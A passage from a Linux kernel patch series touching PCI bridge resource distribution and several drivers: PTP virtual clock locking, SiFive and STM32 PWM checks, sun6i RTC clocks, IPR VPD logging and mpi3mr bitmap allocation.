++	 * BARs and windows on "bus".
+ 	 */
+-	if (hotplug_bridges + normal_bridges == 1) {
+-		dev = list_first_entry(&bus->devices, struct pci_dev, bus_list);
+-		if (dev->subordinate)
+-			pci_bus_distribute_available_resources(dev->subordinate,
+-				add_list, io, mmio, mmio_pref);
+-		return;
++	list_for_each_entry(dev, &bus->devices, bus_list) {
++		if (!dev->is_virtfn)
++			remove_dev_resources(dev, &io, &mmio, &mmio_pref);
+ 	}
+ 
+-	if (hotplug_bridges == 0)
+-		return;
+-
+ 	/*
+-	 * Calculate the total amount of extra resource space we can
+-	 * pass to bridges below this one.  This is basically the
+-	 * extra space reduced by the minimal required space for the
+-	 * non-hotplug bridges.
++	 * If there is at least one hotplug bridge on this bus it gets all
++	 * the extra resource space that was left after the reductions
++	 * above.
++	 *
++	 * If there are no hotplug bridges the extra resource space is
++	 * split between non-hotplug bridges. This is to allow possible
++	 * hotplug bridges below them to get the extra space as well.
+ 	 */
++	if (hotplug_bridges) {
++		io_per_b = div64_ul(resource_size(&io), hotplug_bridges);
++		mmio_per_b = div64_ul(resource_size(&mmio), hotplug_bridges);
++		mmio_pref_per_b = div64_ul(resource_size(&mmio_pref),
++					   hotplug_bridges);
++	} else {
++		io_per_b = div64_ul(resource_size(&io), normal_bridges);
++		mmio_per_b = div64_ul(resource_size(&mmio), normal_bridges);
++		mmio_pref_per_b = div64_ul(resource_size(&mmio_pref),
++					   normal_bridges);
++	}
++
+ 	for_each_pci_bridge(dev, bus) {
+-		resource_size_t used_size;
+ 		struct resource *res;
++		struct pci_bus *b;
+ 
+-		if (dev->is_hotplug_bridge)
++		b = dev->subordinate;
++		if (!b)
++			continue;
++		if (hotplug_bridges && !dev->is_hotplug_bridge)
+ 			continue;
+ 
++		res = &dev->resource[PCI_BRIDGE_IO_WINDOW];
++
+ 		/*
+-		 * Reduce the available resource space by what the
+-		 * bridge and devices below it occupy.
++		 * Make sure the split resource space is properly aligned
++		 * for bridge windows (align it down to avoid going above
++		 * what is available).
+ 		 */
+-		res = &dev->resource[PCI_BRIDGE_IO_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(io.start, align) - io.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			io.start = min(io.start + used_size, io.end + 1);
++		io.end = align ? io.start + ALIGN_DOWN(io_per_b, align) - 1
++			       : io.start + io_per_b - 1;
++
++		/*
++		 * The x_per_b holds the extra resource space that can be
++		 * added for each bridge but there is the minimal already
++		 * reserved as well so adjust x.start down accordingly to
++		 * cover the whole space.
++		 */
++		io.start -= resource_size(res);
+ 
+ 		res = &dev->resource[PCI_BRIDGE_MEM_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(mmio.start, align) - mmio.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			mmio.start = min(mmio.start + used_size, mmio.end + 1);
++		mmio.end = align ? mmio.start + ALIGN_DOWN(mmio_per_b, align) - 1
++				 : mmio.start + mmio_per_b - 1;
++		mmio.start -= resource_size(res);
+ 
+ 		res = &dev->resource[PCI_BRIDGE_PREF_MEM_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(mmio_pref.start, align) -
+-			mmio_pref.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			mmio_pref.start = min(mmio_pref.start + used_size,
+-				mmio_pref.end + 1);
+-	}
+-
+-	io_per_hp = div64_ul(resource_size(&io), hotplug_bridges);
+-	mmio_per_hp = div64_ul(resource_size(&mmio), hotplug_bridges);
+-	mmio_pref_per_hp = div64_ul(resource_size(&mmio_pref),
+-		hotplug_bridges);
+-
+-	/*
+-	 * Go over devices on this bus and distribute the remaining
+-	 * resource space between hotplug bridges.
+-	 */
+-	for_each_pci_bridge(dev, bus) {
+-		struct pci_bus *b;
+-
+-		b = dev->subordinate;
+-		if (!b || !dev->is_hotplug_bridge)
+-			continue;
+-
+-		/*
+-		 * Distribute available extra resources equally between
+-		 * hotplug-capable downstream ports taking alignment into
+-		 * account.
+-		 */
+-		io.end = io.start + io_per_hp - 1;
+-		mmio.end = mmio.start + mmio_per_hp - 1;
+-		mmio_pref.end = mmio_pref.start + mmio_pref_per_hp - 1;
++		mmio_pref.end = align ? mmio_pref.start +
++					ALIGN_DOWN(mmio_pref_per_b, align) - 1
++				      : mmio_pref.start + mmio_pref_per_b - 1;
++		mmio_pref.start -= resource_size(res);
+ 
+ 		pci_bus_distribute_available_resources(b, add_list, io, mmio,
+ 						       mmio_pref);
+ 
+-		io.start += io_per_hp;
+-		mmio.start += mmio_per_hp;
+-		mmio_pref.start += mmio_pref_per_hp;
++		io.start += io.end + 1;
++		mmio.start += mmio.end + 1;
++		mmio_pref.start += mmio_pref.end + 1;
+ 	}
+ }
+ 
+@@ -1923,6 +1975,8 @@ static void pci_bridge_distribute_available_resources(struct pci_dev *bridge,
+ 	if (!bridge->is_hotplug_bridge)
+ 		return;
+ 
++	pci_dbg(bridge, "distributing available resources\n");
++
+ 	/* Take the initial extra resources from the hotplug port */
+ 	available_io = bridge->resource[PCI_BRIDGE_IO_WINDOW];
+ 	available_mmio = bridge->resource[PCI_BRIDGE_MEM_WINDOW];
+@@ -1934,6 +1988,54 @@ static void pci_bridge_distribute_available_resources(struct pci_dev *bridge,
+ 					       available_mmio_pref);
+ }
+ 
++static bool pci_bridge_resources_not_assigned(struct pci_dev *dev)
++{
++	const struct resource *r;
++
++	/*
++	 * If the child device's resources are not yet assigned it means we
++	 * are configuring them (not the boot firmware), so we should be
++	 * able to extend the upstream bridge resources in the same way we
++	 * do with the normal hotplug case.
++	 */
++	r = &dev->resource[PCI_BRIDGE_IO_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++	r = &dev->resource[PCI_BRIDGE_MEM_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++	r = &dev->resource[PCI_BRIDGE_PREF_MEM_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++
++	return true;
++}
++
++static void
++pci_root_bus_distribute_available_resources(struct pci_bus *bus,
++					    struct list_head *add_list)
++{
++	struct pci_dev *dev, *bridge = bus->self;
++
++	for_each_pci_bridge(dev, bus) {
++		struct pci_bus *b;
++
++		b = dev->subordinate;
++		if (!b)
++			continue;
++
++		/*
++		 * Need to check "bridge" here too because it is NULL
++		 * in case of root bus.
++		 */
++		if (bridge && pci_bridge_resources_not_assigned(dev))
++			pci_bridge_distribute_available_resources(bridge,
++								  add_list);
++		else
++			pci_root_bus_distribute_available_resources(b, add_list);
++	}
++}
++
+ /*
+  * First try will not touch PCI bridge res.
+  * Second and later try will clear small leaf bridge res.
+@@ -1973,6 +2075,8 @@ again:
+ 	 */
+ 	__pci_bus_size_bridges(bus, add_list);
+ 
++	pci_root_bus_distribute_available_resources(bus, add_list);
++
+ 	/* Depth last, allocate resources and update the hardware. */
+ 	__pci_bus_assign_resources(bus, add_list, &fail_head);
+ 	if (add_list)
+diff --git a/drivers/phy/rockchip/phy-rockchip-typec.c b/drivers/phy/rockchip/phy-rockchip-typec.c
+index 6aea512e5d4ee..39db8acde61af 100644
+--- a/drivers/phy/rockchip/phy-rockchip-typec.c
++++ b/drivers/phy/rockchip/phy-rockchip-typec.c
+@@ -808,9 +808,8 @@ static int tcphy_get_mode(struct rockchip_typec_phy *tcphy)
+ 	struct extcon_dev *edev = tcphy->extcon;
+ 	union extcon_property_value property;
+ 	unsigned int id;
+-	bool ufp, dp;
+ 	u8 mode;
+-	int ret;
++	int ret, ufp, dp;
+ 
+ 	if (!edev)
+ 		return MODE_DFP_USB;
+diff --git a/drivers/ptp/ptp_private.h b/drivers/ptp/ptp_private.h
+index 77918a2c67018..75f58fc468a71 100644
+--- a/drivers/ptp/ptp_private.h
++++ b/drivers/ptp/ptp_private.h
+@@ -66,7 +66,7 @@ struct ptp_vclock {
+ 	struct hlist_node vclock_hash_node;
+ 	struct cyclecounter cc;
+ 	struct timecounter tc;
+-	spinlock_t lock;	/* protects tc/cc */
++	struct mutex lock;	/* protects tc/cc */
+ };
+ 
+ /*
+diff --git a/drivers/ptp/ptp_vclock.c b/drivers/ptp/ptp_vclock.c
+index 1c0ed4805c0aa..dcf752c9e0450 100644
+--- a/drivers/ptp/ptp_vclock.c
++++ b/drivers/ptp/ptp_vclock.c
+@@ -43,16 +43,16 @@ static void ptp_vclock_hash_del(struct ptp_vclock *vclock)
+ static int ptp_vclock_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 	s64 adj;
+ 
+ 	adj = (s64)scaled_ppm << PTP_VCLOCK_FADJ_SHIFT;
+ 	adj = div_s64(adj, PTP_VCLOCK_FADJ_DENOMINATOR);
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_read(&vclock->tc);
+ 	vclock->cc.mult = PTP_VCLOCK_CC_MULT + adj;
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -60,11 +60,11 @@ static int ptp_vclock_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ static int ptp_vclock_adjtime(struct ptp_clock_info *ptp, s64 delta)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_adjtime(&vclock->tc, delta);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -73,12 +73,12 @@ static int ptp_vclock_gettime(struct ptp_clock_info *ptp,
+ 			      struct timespec64 *ts)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 	u64 ns;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_read(&vclock->tc);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 	*ts = ns_to_timespec64(ns);
+ 
+ 	return 0;
+@@ -91,7 +91,6 @@ static int ptp_vclock_gettimex(struct ptp_clock_info *ptp,
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	struct ptp_clock *pptp = vclock->pclock;
+ 	struct timespec64 pts;
+-	unsigned long flags;
+ 	int err;
+ 	u64 ns;
+ 
+@@ -99,9 +98,10 @@ static int ptp_vclock_gettimex(struct ptp_clock_info *ptp,
+ 	if (err)
+ 		return err;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_cyc2time(&vclock->tc, timespec64_to_ns(&pts));
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	*ts = ns_to_timespec64(ns);
+ 
+@@ -113,11 +113,11 @@ static int ptp_vclock_settime(struct ptp_clock_info *ptp,
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	u64 ns = timespec64_to_ns(ts);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_init(&vclock->tc, &vclock->cc, ns);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -127,7 +127,6 @@ static int ptp_vclock_getcrosststamp(struct ptp_clock_info *ptp,
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	struct ptp_clock *pptp = vclock->pclock;
+-	unsigned long flags;
+ 	int err;
+ 	u64 ns;
+ 
+@@ -135,9 +134,10 @@ static int ptp_vclock_getcrosststamp(struct ptp_clock_info *ptp,
+ 	if (err)
+ 		return err;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_cyc2time(&vclock->tc, ktime_to_ns(xtstamp->device));
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	xtstamp->device = ns_to_ktime(ns);
+ 
+@@ -205,7 +205,7 @@ struct ptp_vclock *ptp_vclock_register(struct ptp_clock *pclock)
+ 
+ 	INIT_HLIST_NODE(&vclock->vclock_hash_node);
+ 
+-	spin_lock_init(&vclock->lock);
++	mutex_init(&vclock->lock);
+ 
+ 	vclock->clock = ptp_clock_register(&vclock->info, &pclock->dev);
+ 	if (IS_ERR_OR_NULL(vclock->clock)) {
+@@ -269,7 +269,6 @@ ktime_t ptp_convert_timestamp(const ktime_t *hwtstamp, int vclock_index)
+ {
+ 	unsigned int hash = vclock_index % HASH_SIZE(vclock_hash);
+ 	struct ptp_vclock *vclock;
+-	unsigned long flags;
+ 	u64 ns;
+ 	u64 vclock_ns = 0;
+ 
+@@ -281,9 +280,10 @@ ktime_t ptp_convert_timestamp(const ktime_t *hwtstamp, int vclock_index)
+ 		if (vclock->clock->index != vclock_index)
+ 			continue;
+ 
+-		spin_lock_irqsave(&vclock->lock, flags);
++		if (mutex_lock_interruptible(&vclock->lock))
++			break;
+ 		vclock_ns = timecounter_cyc2time(&vclock->tc, ns);
+-		spin_unlock_irqrestore(&vclock->lock, flags);
++		mutex_unlock(&vclock->lock);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/pwm/pwm-sifive.c b/drivers/pwm/pwm-sifive.c
+index bb72393134016..89d53a0f91e65 100644
+--- a/drivers/pwm/pwm-sifive.c
++++ b/drivers/pwm/pwm-sifive.c
+@@ -159,7 +159,13 @@ static int pwm_sifive_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	mutex_lock(&ddata->lock);
+ 	if (state->period != ddata->approx_period) {
+-		if (ddata->user_count != 1) {
++		/*
++		 * Don't let a 2nd user change the period underneath the 1st user.
++		 * However if ddate->approx_period == 0 this is the first time we set
++		 * any period, so let whoever gets here first set the period so other
++		 * users who agree on the period won't fail.
++		 */
++		if (ddata->user_count != 1 && ddata->approx_period) {
+ 			mutex_unlock(&ddata->lock);
+ 			return -EBUSY;
+ 		}
+diff --git a/drivers/pwm/pwm-stm32-lp.c b/drivers/pwm/pwm-stm32-lp.c
+index 3115abb3f52ab..61a1c87cd5016 100644
+--- a/drivers/pwm/pwm-stm32-lp.c
++++ b/drivers/pwm/pwm-stm32-lp.c
+@@ -127,7 +127,7 @@ static int stm32_pwm_lp_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	/* ensure CMP & ARR registers are properly written */
+ 	ret = regmap_read_poll_timeout(priv->regmap, STM32_LPTIM_ISR, val,
+-				       (val & STM32_LPTIM_CMPOK_ARROK),
++				       (val & STM32_LPTIM_CMPOK_ARROK) == STM32_LPTIM_CMPOK_ARROK,
+ 				       100, 1000);
+ 	if (ret) {
+ 		dev_err(priv->chip.dev, "ARR/CMP registers write issue\n");
+diff --git a/drivers/rtc/interface.c b/drivers/rtc/interface.c
+index 9edd662c69ace..3d0fbc644f578 100644
+--- a/drivers/rtc/interface.c
++++ b/drivers/rtc/interface.c
+@@ -392,7 +392,7 @@ int rtc_read_alarm(struct rtc_device *rtc, struct rtc_wkalrm *alarm)
+ 		return err;
+ 	if (!rtc->ops) {
+ 		err = -ENODEV;
+-	} else if (!test_bit(RTC_FEATURE_ALARM, rtc->features) || !rtc->ops->read_alarm) {
++	} else if (!test_bit(RTC_FEATURE_ALARM, rtc->features)) {
+ 		err = -EINVAL;
+ 	} else {
+ 		memset(alarm, 0, sizeof(struct rtc_wkalrm));
+diff --git a/drivers/rtc/rtc-sun6i.c b/drivers/rtc/rtc-sun6i.c
+index ed5516089e9a0..7038f47d77ff4 100644
+--- a/drivers/rtc/rtc-sun6i.c
++++ b/drivers/rtc/rtc-sun6i.c
+@@ -136,7 +136,6 @@ struct sun6i_rtc_clk_data {
+ 	unsigned int fixed_prescaler : 16;
+ 	unsigned int has_prescaler : 1;
+ 	unsigned int has_out_clk : 1;
+-	unsigned int export_iosc : 1;
+ 	unsigned int has_losc_en : 1;
+ 	unsigned int has_auto_swt : 1;
+ };
+@@ -271,10 +270,8 @@ static void __init sun6i_rtc_clk_init(struct device_node *node,
+ 	/* Yes, I know, this is ugly. */
+ 	sun6i_rtc = rtc;
+ 
+-	/* Only read IOSC name from device tree if it is exported */
+-	if (rtc->data->export_iosc)
+-		of_property_read_string_index(node, "clock-output-names", 2,
+-					      &iosc_name);
++	of_property_read_string_index(node, "clock-output-names", 2,
++				      &iosc_name);
+ 
+ 	rtc->int_osc = clk_hw_register_fixed_rate_with_accuracy(NULL,
+ 								iosc_name,
+@@ -315,13 +312,10 @@ static void __init sun6i_rtc_clk_init(struct device_node *node,
+ 		goto err_register;
+ 	}
+ 
+-	clk_data->num = 2;
++	clk_data->num = 3;
+ 	clk_data->hws[0] = &rtc->hw;
+ 	clk_data->hws[1] = __clk_get_hw(rtc->ext_losc);
+-	if (rtc->data->export_iosc) {
+-		clk_data->hws[2] = rtc->int_osc;
+-		clk_data->num = 3;
+-	}
++	clk_data->hws[2] = rtc->int_osc;
+ 	of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	return;
+ 
+@@ -361,7 +355,6 @@ static const struct sun6i_rtc_clk_data sun8i_h3_rtc_data = {
+ 	.fixed_prescaler = 32,
+ 	.has_prescaler = 1,
+ 	.has_out_clk = 1,
+-	.export_iosc = 1,
+ };
+ 
+ static void __init sun8i_h3_rtc_clk_init(struct device_node *node)
+@@ -379,7 +372,6 @@ static const struct sun6i_rtc_clk_data sun50i_h6_rtc_data = {
+ 	.fixed_prescaler = 32,
+ 	.has_prescaler = 1,
+ 	.has_out_clk = 1,
+-	.export_iosc = 1,
+ 	.has_losc_en = 1,
+ 	.has_auto_swt = 1,
+ };
+diff --git a/drivers/scsi/ipr.c b/drivers/scsi/ipr.c
+index 2022ffb450417..8c062afb2918d 100644
+--- a/drivers/scsi/ipr.c
++++ b/drivers/scsi/ipr.c
+@@ -1516,23 +1516,22 @@ static void ipr_process_ccn(struct ipr_cmnd *ipr_cmd)
+ }
+ 
+ /**
+- * strip_and_pad_whitespace - Strip and pad trailing whitespace.
+- * @i:		index into buffer
+- * @buf:		string to modify
++ * strip_whitespace - Strip and pad trailing whitespace.
++ * @i:		size of buffer
++ * @buf:	string to modify
+  *
+- * This function will strip all trailing whitespace, pad the end
+- * of the string with a single space, and NULL terminate the string.
++ * This function will strip all trailing whitespace and
++ * NUL terminate the string.
+  *
+- * Return value:
+- * 	new length of string
+  **/
+-static int strip_and_pad_whitespace(int i, char *buf)
++static void strip_whitespace(int i, char *buf)
+ {
++	if (i < 1)
++		return;
++	i--;
+ 	while (i && buf[i] == ' ')
+ 		i--;
+-	buf[i+1] = ' ';
+-	buf[i+2] = '\0';
+-	return i + 2;
++	buf[i+1] = '\0';
+ }
+ 
+ /**
+@@ -1547,19 +1546,21 @@ static int strip_and_pad_whitespace(int i, char *buf)
+ static void ipr_log_vpd_compact(char *prefix, struct ipr_hostrcb *hostrcb,
+ 				struct ipr_vpd *vpd)
+ {
+-	char buffer[IPR_VENDOR_ID_LEN + IPR_PROD_ID_LEN + IPR_SERIAL_NUM_LEN + 3];
+-	int i = 0;
++	char vendor_id[IPR_VENDOR_ID_LEN + 1];
++	char product_id[IPR_PROD_ID_LEN + 1];
++	char sn[IPR_SERIAL_NUM_LEN + 1];
+ 
+-	memcpy(buffer, vpd->vpids.vendor_id, IPR_VENDOR_ID_LEN);
+-	i = strip_and_pad_whitespace(IPR_VENDOR_ID_LEN - 1, buffer);
++	memcpy(vendor_id, vpd->vpids.vendor_id, IPR_VENDOR_ID_LEN);
++	strip_whitespace(IPR_VENDOR_ID_LEN, vendor_id);
+ 
+-	memcpy(&buffer[i], vpd->vpids.product_id, IPR_PROD_ID_LEN);
+-	i = strip_and_pad_whitespace(i + IPR_PROD_ID_LEN - 1, buffer);
++	memcpy(product_id, vpd->vpids.product_id, IPR_PROD_ID_LEN);
++	strip_whitespace(IPR_PROD_ID_LEN, product_id);
+ 
+-	memcpy(&buffer[i], vpd->sn, IPR_SERIAL_NUM_LEN);
+-	buffer[IPR_SERIAL_NUM_LEN + i] = '\0';
++	memcpy(sn, vpd->sn, IPR_SERIAL_NUM_LEN);
++	strip_whitespace(IPR_SERIAL_NUM_LEN, sn);
+ 
+-	ipr_hcam_err(hostrcb, "%s VPID/SN: %s\n", prefix, buffer);
++	ipr_hcam_err(hostrcb, "%s VPID/SN: %s %s %s\n", prefix,
++		     vendor_id, product_id, sn);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/mpi3mr/mpi3mr.h b/drivers/scsi/mpi3mr/mpi3mr.h
+index def4c5e15cd89..8a438f248a820 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr.h
++++ b/drivers/scsi/mpi3mr/mpi3mr.h
+@@ -955,19 +955,16 @@ struct scmd_priv {
+  * @chain_buf_count: Chain buffer count
+  * @chain_buf_pool: Chain buffer pool
+  * @chain_sgl_list: Chain SGL list
+- * @chain_bitmap_sz: Chain buffer allocator bitmap size
+  * @chain_bitmap: Chain buffer allocator bitmap
+  * @chain_buf_lock: Chain buffer list lock
+  * @bsg_cmds: Command tracker for BSG command
+  * @host_tm_cmds: Command tracker for task management commands
+  * @dev_rmhs_cmds: Command tracker for device removal commands
+  * @evtack_cmds: Command tracker for event ack commands
+- * @devrem_bitmap_sz: Device removal bitmap size
+  * @devrem_bitmap: Device removal bitmap
+- * @dev_handle_bitmap_sz: Device handle bitmap size
++ * @dev_handle_bitmap_bits: Number of bits in device handle bitmap
+  * @removepend_bitmap: Remove pending bitmap
+  * @delayed_rmhs_list: Delayed device removal list
+- * @evtack_cmds_bitmap_sz: Event Ack bitmap size
+  * @evtack_cmds_bitmap: Event Ack bitmap
+  * @delayed_evtack_cmds_list: Delayed event acknowledgment list
+  * @ts_update_counter: Timestamp update counter
+@@ -1128,7 +1125,6 @@ struct mpi3mr_ioc {
+ 	u32 chain_buf_count;
+ 	struct dma_pool *chain_buf_pool;
+ 	struct chain_element *chain_sgl_list;
+-	u16  chain_bitmap_sz;
+ 	void *chain_bitmap;
+ 	spinlock_t chain_buf_lock;
+ 
+@@ -1136,12 +1132,10 @@ struct mpi3mr_ioc {
+ 	struct mpi3mr_drv_cmd host_tm_cmds;
+ 	struct mpi3mr_drv_cmd dev_rmhs_cmds[MPI3MR_NUM_DEVRMCMD];
+ 	struct mpi3mr_drv_cmd evtack_cmds[MPI3MR_NUM_EVTACKCMD];
+-	u16 devrem_bitmap_sz;
+ 	void *devrem_bitmap;
+-	u16 dev_handle_bitmap_sz;
++	u16 dev_handle_bitmap_bits;
+ 	void *removepend_bitmap;
+ 	struct list_head delayed_rmhs_list;
+-	u16 evtack_cmds_bitmap_sz;
+ 	void *evtack_cmds_bitmap;
+ 	struct list_head delayed_evtack_cmds_list;
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 0c4aabaefdcc4..1e4467ea8472a 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1128,7 +1128,6 @@ static int mpi3mr_issue_and_process_mur(struct mpi3mr_ioc *mrioc,
+ static int
+ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+ {
+-	u16 dev_handle_bitmap_sz;
+ 	void *removepend_bitmap;
+ 
+ 	if (mrioc->facts.reply_sz > mrioc->reply_sz) {
+@@ -1160,25 +1159,23 @@ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+ 		    "\tcontroller while sas transport support is enabled at the\n"
+ 		    "\tdriver, please reboot the system or reload the driver\n");
+ 
+-	dev_handle_bitmap_sz = mrioc->facts.max_devhandle / 8;
+-	if (mrioc->facts.max_devhandle % 8)
+-		dev_handle_bitmap_sz++;
+-	if (dev_handle_bitmap_sz > mrioc->dev_handle_bitmap_sz) {
+-		removepend_bitmap = krealloc(mrioc->removepend_bitmap,
+-		    dev_handle_bitmap_sz, GFP_KERNEL);
++	if (mrioc->facts.max_devhandle > mrioc->dev_handle_bitmap_bits) {
++		removepend_bitmap = bitmap_zalloc(mrioc->facts.max_devhandle,
++						  GFP_KERNEL);
+ 		if (!removepend_bitmap) {
+ 			ioc_err(mrioc,
+-			    "failed to increase removepend_bitmap sz from: %d to %d\n",
+-			    mrioc->dev_handle_bitmap_sz, dev_handle_bitmap_sz);
++				"failed to increase removepend_bitmap bits from %d to %d\n",
++				mrioc->dev_handle_bitmap_bits,
++				mrioc->facts.max_devhandle);
+ 			return -EPERM;
+ 		}
+-		memset(removepend_bitmap + mrioc->dev_handle_bitmap_sz, 0,
+-		    dev_handle_bitmap_sz - mrioc->dev_handle_bitmap_sz);
++		bitmap_free(mrioc->removepend_bitmap);
+ 		mrioc->removepend_bitmap = removepend_bitmap;
+ 		ioc_info(mrioc,
+-		    "increased dev_handle_bitmap_sz from %d to %d\n",
+-		    mrioc->dev_handle_bitmap_sz, dev_handle_bitmap_sz);
+-		mrioc->dev_handle_bitmap_sz = dev_handle_bitmap_sz;
++			 "increased bits of dev_handle_bitmap from %d to %d\n",
++			 mrioc->dev_handle_bitmap_bits,
++			 mrioc->facts.max_devhandle);
++		mrioc->dev_handle_bitmap_bits = mrioc->facts.max_devhandle;
+ 	}
+ 
+ 	return 0;
+@@ -2957,27 +2954,18 @@ static int mpi3mr_alloc_reply_sense_bufs(struct mpi3mr_ioc *mrioc)
+ 	if (!mrioc->pel_abort_cmd.reply)
+ 		goto out_failed;
+ 
+-	mrioc->dev_handle_bitmap_sz = mrioc->facts.max_devhandle / 8;
+-	if (mrioc->facts.max_devhandle % 8)
+-		mrioc->dev_handle_bitmap_sz++;
+-	mrioc->removepend_bitmap = kzalloc(mrioc->dev_handle_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->dev_handle_bitmap_bits = mrioc->facts.max_devhandle;
++	mrioc->removepend_bitmap = bitmap_zalloc(mrioc->dev_handle_bitmap_bits,
++						 GFP_KERNEL);
+ 	if (!mrioc->removepend_bitmap)
+ 		goto out_failed;
+ 
+-	mrioc->devrem_bitmap_sz = MPI3MR_NUM_DEVRMCMD / 8;
+-	if (MPI3MR_NUM_DEVRMCMD % 8)
+-		mrioc->devrem_bitmap_sz++;
+-	mrioc->devrem_bitmap = kzalloc(mrioc->devrem_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->devrem_bitmap = bitmap_zalloc(MPI3MR_NUM_DEVRMCMD, GFP_KERNEL);
+ 	if (!mrioc->devrem_bitmap)
+ 		goto out_failed;
+ 
+-	mrioc->evtack_cmds_bitmap_sz = MPI3MR_NUM_EVTACKCMD / 8;
+-	if (MPI3MR_NUM_EVTACKCMD % 8)
+-		mrioc->evtack_cmds_bitmap_sz++;
+-	mrioc->evtack_cmds_bitmap = kzalloc(mrioc->evtack_cmds_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->evtack_cmds_bitmap = bitmap_zalloc(MPI3MR_NUM_EVTACKCMD,
++						  GFP_KERNEL);
+ 	if (!mrioc->evtack_cmds_bitmap)
+ 		goto out_failed;
+ 
+@@ -3415,10 +3403,7 @@ static int mpi3mr_alloc_chain_bufs(struct mpi3mr_ioc *mrioc)
+ 		if (!mrioc->chain_sgl_list[i].addr)
+ 			goto out_failed;
+ 	}
+-	mrioc->chain_bitmap_sz = num_chains / 8;
+-	if (num_chains % 8)
+-		mrioc->chain_bitmap_sz++;
+-	mrioc->chain_bitmap = kzalloc(mrioc->chain_bitmap_sz, GFP_KERNEL);
++	mrioc->chain_bitmap = bitmap_zalloc(num_chains, GFP_KERNEL);
+ 	if (!mrioc->chain_bitmap)
+ 		goto out_failed;
+ 	return retval;
+@@ -4190,10 +4175,11 @@ void mpi3mr_memset_buffers(struct mpi3mr_ioc *mrioc)
+ 		for (i = 0; i < MPI3MR_NUM_EVTACKCMD; i++)
+ 			memset(mrioc->evtack_cmds[i].reply, 0,
+ 			    sizeof(*mrioc->evtack_cmds[i].reply));
+-		memset(mrioc->removepend_bitmap, 0, mrioc->dev_handle_bitmap_sz);
+-		memset(mrioc->devrem_bitmap, 0, mrioc->devrem_bitmap_sz);
+-		memset(mrioc->evtack_cmds_bitmap, 0,
+-		    mrioc->evtack_cmds_bitmap_sz);
++		bitmap_clear(mrioc->removepend_bitmap, 0,
++			     mrioc->dev_handle_bitmap_bits);
++		bitmap_clear(mrioc->devrem_bitmap, 0, MPI3MR_NUM_DEVRMCMD);
++		bitmap_clear(mrioc->evtack_cmds_bitmap, 0,
++			     MPI3MR_NUM_EVTACKCMD);
+ 	}
+ 
+ 	for (i = 0; i < mrioc->num_queues; i++) {
+@@ -4319,16 +4305,16 @@ void mpi3mr_free_mem(struct mpi3mr_ioc *mrioc)
+ 		mrioc->evtack_cmds[i].reply = NULL;
+ 	}
+ 
+-	kfree(mrioc->removepend_bitmap);
++	bitmap_free(mrioc->removepend_bitmap);
+ 	mrioc->removepend_bitmap = NULL;
+ 
+-	kfree(mrioc->devrem_bitmap);
++	bitmap_free(mrioc->devrem_bitmap);
+ 	mrioc->devrem_bitmap = NULL;
+ 
+-	kfree(mrioc->evtack_cmds_bitmap);
